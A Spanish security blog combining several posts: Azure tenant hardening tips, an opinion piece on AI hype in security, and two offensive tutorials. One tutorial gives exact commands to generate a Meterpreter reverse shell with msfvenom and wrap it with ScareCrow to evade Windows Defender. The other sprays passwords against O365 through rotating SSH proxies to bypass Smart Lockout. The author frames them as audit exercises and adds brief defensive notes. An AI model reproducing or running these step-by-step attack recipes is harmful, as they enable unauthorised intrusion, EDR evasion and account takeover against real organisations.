Día 2: Revisa la configuración de Azure

  Estimados amigos de Inseguros !!!

Seguimos con la serie configuraciones y aspectos a revisar en la configuración de Azure. Viste el Día 1?

Muchos de vosotros que me seguís y venís a los cursos, os gusta la teoría, os gusta el planteamiento de conocer en profundidad cómo funcionan las cosas, pero muchos se que queréis ir al grano, queréis el click rápido... Aunque no es mi visión, con esta serie voy a intentar daros algunos consejos, o pautas, o simplemente sitios donde pinchar a loco :-) para mejorar la seguridad de vuestros tenant Azure.

Recuerda que tienes este curso y otros más en el Pack completo gratuito con Fundae en España. 

Espero que os gusten los recursos que os voy dando, pero valorar la posibilidad de ir más allá y adentraros en conocer este mundo del cloud de Microsoft que sin duda es el presente de muchas organizaciones. 

Consejo 2

• Configuración de usuarios. Comprobar.

En esta ocasión vamos a comprobar varias configuraciones relativas a los usuarios en plan genérico, no en distintos tipos de usuarios o roles.

Es importante que los usuarios no puedan registrar aplicaciones, ya que estamos dejando que ellos "deleguen" sus permisos sobre el tenant y los recusos a aplicaciones que pueden que no sean las correctas, las de las empresa. Podeís ver el funcionamiento de la herramienta O365 Stealer y como aprvechamos esta característica para registrar una aplicación externa, con los permisos sobre el tenant de la víctima.

La segunda opción,   Impedir que los usuarios que no sean administradores creen inquilinos  , prohibe que un usuario de tu organización registre un nuevo tenant con su cuenta. Imagina que tienes un @empresa.com y tu usuario registra un tenenat nuevo empressa.com en el que es global admin. Estaría abriendo el camino a poder engañar a los usuarios legítimos. En alguna ocasión me he encontrado alumnos que querían usar su cuenta empresarial para crear un tenant desde cero para el curso y no les dejaba... 

Otra opción a controlar, Los usuarios pueden crear grupos de seguridad , simplemente no le encuentro la necesidad de que un usuario deba hacerlo,  y puede ser un vector descontrolado a la hora de tener usuarios con más permisos de la cuenta sobre algún recurso de manera descontrolada.

Usuarios Invitados: Debemos establecer cual es el comportamiento que queremos para estos usuarios por defecto. Soy partidario de ser lo más restrictivo por defecto para estos usuarios, y luego jugar con los roles concretos en casos puntuales para colaboradores que así lo requieran. Si quieres ampliar un poco más sobre qué pueden hacer en cada uno de los niveles, este es tu enlace.

Restringir el acceso al Centro de administración de Microsoft Entra marcado a si. Lo que tenemos que tener en cuenta es que con esta medida, estamos controlando que los usuarios no administradores no puedan entrar a portal.azure.com , pero si que pueden entrar a administrar Microsoft Entra mediante Powershell, Azure cli, Ms Graph, etc. La manera correcta de bloquear este acceso es mediante Acceso Condicional a la aplicación: Windows Azure Service Management Api

Permitir a los usuarios conectar su cuenta profesional o educativa con LinkedIn  No me gusta esta opción, ya que prefiero usar el correo corporativo para mis usuarios y así tenerlos controlados.

Mostrar mantener el usuario con la sesión iniciada  Aunque no tiene nada que ver con los tokens, si con la cookie. Mejor hacer que cuando hace login un usuario no le pregunte si quiere permanecer conectado.

Mañana seguimos con más...

Lo has revisado? qué configuración tenías? Ánimate y sigue la serie. Este consejo es muy sencillo, pero iremos avanzando con otros quickwins más interesantes.

Y en paralelo, ya sabes que tenemos dos cursos relacionados con Azure en la academia. Uno grabado, donde tu puedes hacerlo a tu aire, y otro Online en donde tienes 3 días en los que obligarte a atender a las clases, aunque en ambos cursos deberás hacer muchas prácticas, yo calculo que unos 10 días a raticos.

Como siempre, gracias por leerme !!!

Recuerda, hacemos los mejores cursos de ciberseguridad y ofrecemos servicios de auditoría experta en entornos Microsoft.

Día 1: Revisa la configuración de Azure

 Estimados amigos de Inseguros !!!

Vamos a iniciar esta serie seria sobre configuraciones y aspectos a revisar en la configuración de Azure.

Muchos de vosotros que me seguís y venís a los cursos, os gusta la teoría, os gusta el planteamiento de conocer en profundidad cómo funcionan las cosas, pero muchos se que queréis ir al grano, queréis el click rápido... Aunque no es mi visión, con esta serie voy a intentar daros algunos consejos, o pautas, o simplemente sitios donde pinchar a loco :-) para mejorar la seguridad de vuestros tenant Azure.

Recuerda que tienes este curso y otros más en el Pack completo gratuito con Fundae en España. 

Espero que os gusten los recursos que os voy dando, pero valorar la posibilidad de ir más allá y adentraros en conocer este mundo del cloud de Microsoft que sin duda es el presente de muchas organizaciones. 

Let´s Go.

• Propiedades predeterminadas del directorio. Comprobar.

Deberíamos comprobar que tenemos actividades las opciones de seguridad predeterminadas, que son el mínimo que cabe esperar de una configuración segura.

En resumidas cuentas, lo que hace este Settting es obligar a los administrador a usar el MFA y bloquear protocolos de autenticación "legacy" como smtp y pop3. Te sugiero que leas en detalle el artículo donde explica en detalle las consideraciones previas.

Lo has revisado? qué configuración tenías? Ánimate y sigue la serie. Este consejo es muy sencillo, pero iremos avanzando con otros quickwins más interesantes.

Como siempre, gracias por leerme !!!

Recuerda, hacemos los mejores cursos de ciberseguridad y ofrecemos servicios de auditoría experta en entornos Microsoft.

Pronto vendrán las tendencias de ciber para 2024... entrará la IA? xD

 Estimados amigos de Inseguros !!!

Se viene la navidad, el final de año, y SEGURO que vamos a encontrar gente que no tiene ni puñetera idea hablando del futuro.

Este sin duda ha sido el año de la IA. En todos los congresos ha habido muy buenas, y otras muy malas, conferencias con este disciplina.

"Expertos" usando Chatgpt... vamos a ver amigo, que eso no es saber de IA. Que eso es como saber que el ibuprofeno quita el dolor de cabeza y creerse médico...

Las modas y lo modales ( en la red) de hoy en día dictan mucho de ser la realidad de la calle.

Las empresas de mi entornos siguen sufriendo ataques de Ransomware. Siguen sufriendo ataques de copromiso del CEO ( Timos en las facturas). Siguen sufriendo ataques de DDOS en sus E-commerce. Siguen sufriendo robo de suscripciones en Azure para ganar capacidad de cómputo y minar BTC...

Las empresas de mi entorno siguen con los vectores de ataque tradicionales... Phishing, sistemas sin parchear y debilidad en credenciales( principalmente carencia de MFA)

A la suma de estpudices y modas, que no digo que no haya que ir gestionándolas, se suman los fabricantes... O los red teamers !! Herramientas de phishing con IA que saben crear mejores textos que el famoso: Soy una chicà de la matre Rusia diszpuest∞a a conocerte... Esto no es la evolución de la IA...

Los aplicativos de red que te prometen la IA, necesitan un modelo de aprendizaje largo, contrastado muchas veces con el humano, ya sabes, realizar muchos circuitos funcionales para enseñar que es bueno y que es malo... Mi experiencia hasta la fecha es que TODOS son vulnerables, al igual que los EDR, los ETC y LOS JPG... xDDD

Vemos muchos ataques contra la IA, contra los modelos de entrenamiento. Para que lo entiendas, coger 10 android y 10 coches y engañar a Google maps con la densidad de tráfico... y SE que la IA se usará para el bien y para el mal. Pero a donde voy...

Voy a reirme de las tendencias y como he dicho de las modas. Que creeis que va a ser más habitual, un ataque contra una VPN por credenciales débiles o leakeadas, o un ataque contra el algoritmo de noseque que produzca nosecuantos?

Como van a entrar los malos en más ocasiones, con un phishing al teams con una factura de un proveedor, o con un deep fake en video de tu jefe con aspecto de haberse pasado con el Botox pidiendo algo raro?

Al final, hay mucha gente que vende del humo, de la prensa, de escribir tonterias, que les generan publicidad...

Yo después de muchos años ya en la ciber, cuando hablo con mis clientes, les recomiendo practicamente las mismas medidas. Inventarias, analizar riesgo, implementar fortificación, modelo de administración tiers---luego basado en privilegios...Entrenamiento al humano. Pentesting constante... Mejora en las capacidades de detección...

Porque si, ese Dark Trace o similar está muy bien, pero va a ser incapaz de parar un ataque a un e-commerce porque alguien ha encontrado un fallo en la generación de cupones de descuento y está comprando pequeños pedidos para luego revenderlos... Digo esto por decir algo. Para que entiendas que el sentido común siempre es la mejor solución.

Otro día, por cambiar de la IA, un amigo mio me decía que ahora todo es IOT, que todos los eventos que va hablan del IOT. Yo le intentaba explicar a mi amigos dos cosas:

1.- Si tienes IOT en tu empresa será un vector más, sino, NO. xD

2.- Cuando el IOT va sobre TCP/IP no deja de ser una LAN/VLAN más. No hay "secreto". Tendrás que fortificar el entorno como te deje el fabricante, tendrás que poner controles entre los entornos de explotación y monitorización. Tendrás que poner medidas de seguridad que sean capaces de detecar anomalías... como en el commerce... como que un  cliente ha comprado 10 veces con un ticket regalo?... como que un plc ahora tiene el doble de tráfico noseque... REGLAS DE NEGOCIO... pero no le veo la diferencia a que sea IOT, OT o sanvinagre... volvemos a las modas...

Y a la parte que me interesa, porque yo vendo auditorias y cursos, es la de estar preparado.

Cuando hablo con un cliente nuevo y me dice que tiene la seguridad bien, porque tiene un UTM y un Edr low cost, me pongo a temblar. En estos casos es la persona el riesgo :-) porque no sabe !!! Tu que lees este blog si sabes de ciberseguridad, pero hay mucha gente que NO, y cree que SI, y lo peor de todo es que no se forma. 

La formación es lo más importante que tenemos, en la vida personal y profesional, y debemos estar constantemente preparados. Leyendo blogs, escuchado podcast, asistiendo a seminarios, incluso de vendors !!! no para comprarle los aburridos clicks de su solución, sino para aprender lo que hacen los malos y los buenos.

En un curso mío de Seguridad Microsoft aprendemos desde que es Mitre, comentamos TTP´s hasta llegamos a hacerlos en Linux con las tools que ya sabes. Imaginas a tu CIO o Sysadmin haciendo esto? imaginas la cara que se les queda cuando haces cualquier dump de hashes y luego los usas como se quedan?

O cuando hacemos el curso de Hacking Azure. Hay alumnos implantadores de click rápido que alucinan... y pentester que están ampliando sus conocmientos. Pero también hay algun CIO que hace el curso y COMPRENDE lo que tiene delante y se conciencia de tomar las acciones correctas...

Pero la triste realidad es que mucha gente va al equisday del fabricante, come buen jamón, el account lo cuida y le renueva al año la "tranquilidad total". Luego pasa lo que pasa.

Por eso amigo lector, huye de las modas, de los hype, de las tendencias, de los gurús, huye de gente como yo xDDDD y picotea de aquí y de allá, y fórmate de la mejor manera, pero el sentido común es algo que no se logra muchas veces con libros xDDD

Espero que te hayas entretenido un rato con el post, gracias por leerme !!!

Recuerda, hacemos los mejores cursos de ciberseguridad y ofrecemos servicios de auditoría experta en entornos Microsoft.

EDR o no EDR, esa es la cuestión: Bypass Defender con ScareCrow

 Estimados amigos de Inseguros !!!

Dentro de las fases que acometen los malos es el de saltarse las medidas defensivas. Y como tal, son ejercicios que debemos de hacer en nuestras organizaciones para saber como se compartan el resto de medida.

En esta ocasión vamos a lanzar una shell Meterpreter contra un Windows parcheado y con Defender y ver como no se entera. Lo vamos a hacer con la herramienta ScareCrow.

Esta herramienta es muy interesante porque firma el binario con la clave pública del dominio https que le digamos, parchear AMIS, ETW y hacer una seria de bypass EDR con la manera que tiene que cargar el código en memoria, para detectar lo que está hookeando el EDR y cargárselo. Si quieres bajar a cómo lo hace, hay dos post muy interesantes. Post 1 y Post 2 donde explica los hooks y las syscall que hace.

El proceso de instalación es muy sencillo.

Se clona el repositorio, se instalan dependencias

go get github.com/fatih/color
go get github.com/yeka/zip
go get github.com/josephspurrier/goversioninfo
go get github.com/Binject/debug/pe
go get github.com/awgh/rawreader

Se comprueba que existen estos paquetes y sino, ya sabes...

openssl
osslsigncode
mingw-w64

Y se compila:

go build ScareCrow.go

Ahora vamos a generar nuestra shell, por ejemplo con meterpreter. Generamos una shell con msfvenemom y ponemos a escuchar.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.100.50 LPORT=12345 -f raw -o fud.bin 

msf6 > use exploit/multi/handler 

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp 

msf6 exploit(multi/handler) > set lport 12345 

msf6 exploit(multi/handler) > set lhost 192.168.100.50 msf6 exploit(multi/handler) > run 

Ahora tomamos la shell y se la pasamos a la herramienta

./ScareCrow -I fud.bin -domain www.microsoft.com -encryptionmode AES 

Ejecutamos en un Windows con Defender y listo. Si te no va a la primera, prueba a compilar otro binario, a la segunda va.

Como puedes adivinar, confiar toda nuestra defensa en una sola línea de defensa es un error. 

Por ejemplo, en mi caso podría haber hecho varias cosas. Podríamos haber bloqueado la ip de origen del equipo que compartido el binario que me ha pillado la primera vez. Podría haber detectado tráfico http entre equipos de una lan que apriori no deberían. Hay muchas maneras de intentar monitorizar lo que pasa es nuestros entornos y así poder luchar contra ataques de este tipo.

Para ello, lo mejor es conocer nuestros sistemas en profundidad y para eso tienes el mejor curso de experto en Ciberseguridad Microsoft del momento. SI. Mejor que muchos "en inglés" muy famososos que te enseñan 4 cosas. 

Si estás trabajando, píde los créditos de formación que tienes disponibles y vamos a pasar 3 meses entretenidos aprendiendo muy mucho Ciberseguridad. 

Si necesitas más información, en la web puedes pedir una cita y charlamos.

Gracias por leerme !!!

Recuerda, hacemos los mejores cursos de ciberseguridad y ofrecemos servicios de auditoría experta en entornos Microsoft.

Fuerza Bruta contra O365 mediante proxy para evadir bloqueos:Trevor

 Estimados amigos de Inseguros!!!

Un de las primeras cosas que debemos mirar a la hora de auditar nuestras infraestructuras es la calidad de las contraseñas, de nuestros empleados o clientes. Realizar una campaña de fuerza bruta con algunas passwords conocidas, relacionadas con el negocio, no me parece una mala idea.

Existen distintas aplicaciones con las que podemos acometer esta misión, pero Azure implementa un mecanismo denominado Smart Lockout que va a detectar los intentos de inicio de sesión fallidos y nos va a bloquear. 

Teniendo como objetivo saltarnos esta medida, vamos a usar algo ya conocido, y es el uso de proxys para repartir las peticiones y así hacer más dificíl a los sistemas defensivos la detección.

Lo vamos a realizar con la herramienta TrevorSpray.  Lo que me gusta de este proyecto es que el autor ha publicado aparte el componente proxy, por lo que mediante proxychains, como hacemos con TOR, podemos usar los nodos para tirar cualquier comando, pero vamos a centrarnos en la fuerza bruta...

Las instrucciones son muy sencillas:

pip install git+https://github.com/blacklanternsecurity/trevorproxy
pip install git+https://github.com/blacklanternsecurity/trevorspray

 export PATH=$PATH:/home/kinomakino/.local/bin

Como con cualquier otra herramienta, le damos un vistazo a las opciones. Me gusta indicar que no haga intentos de bypass del MFA, ya que podría generar mucho ruido. En esta fase nos centramos en obtener credenciales válidas, ya veremos luego como las explotamos.

Un comando sencillo podría ser: trevorspray -u lista_de_usuarios -p 'Password' -nl 

Ahora bien, tiramos la herramienta, y lo que suele pasar es que los filtros Smart Lockout nos cazen y empiece a decirnos que las cuentas están bloqueadas

Ahora es donde metemos la magia y le indicamos que queremos "canalizar" el ataque en uno o más ssh y voila !!!

 trevorspray -u trevor-users2.txt -p 'cosas' 'cosas2' 'cosas3' 'cosas4' -nl --ssh kinomakino@40.77.175.84 kinomakino@51.1.106.102 kinomakino@20.1.198.6 kinomakino@20.4.128.167 --jitter 15 

Desde el punto de vista defensivo, podemos configurar este comportamiento solo si tenemos P1. Si no lo tenemos, funcionará el lockout, pero no podemos configurar valores personalizados.

También sería interesante monitorizar estos log, por ejemplo, desde el visor de inicios de sesión desde Entra ID 

El problema de esta información es que no es "accionable". No podemos vincularle acciones, como haríamos con un SIEM. Pero para eso también tenemos este post donde te enseño a guardar estos registros en Log Analytics y asociarle reglas de ejecución.

Todas estas cosas las puedes encontrar si te animas a realizar el cuso de Hacking y Defensa de Azure y O365. 

Quedan pocas plazas. Quieres que te cuente en una reunión cositas sobre el curso?  

Gracias por leerme !!!

Recuerda, hacemos los mejores cursos de ciberseguridad y ofrecemos servicios de auditoría experta en entornos Microsoft.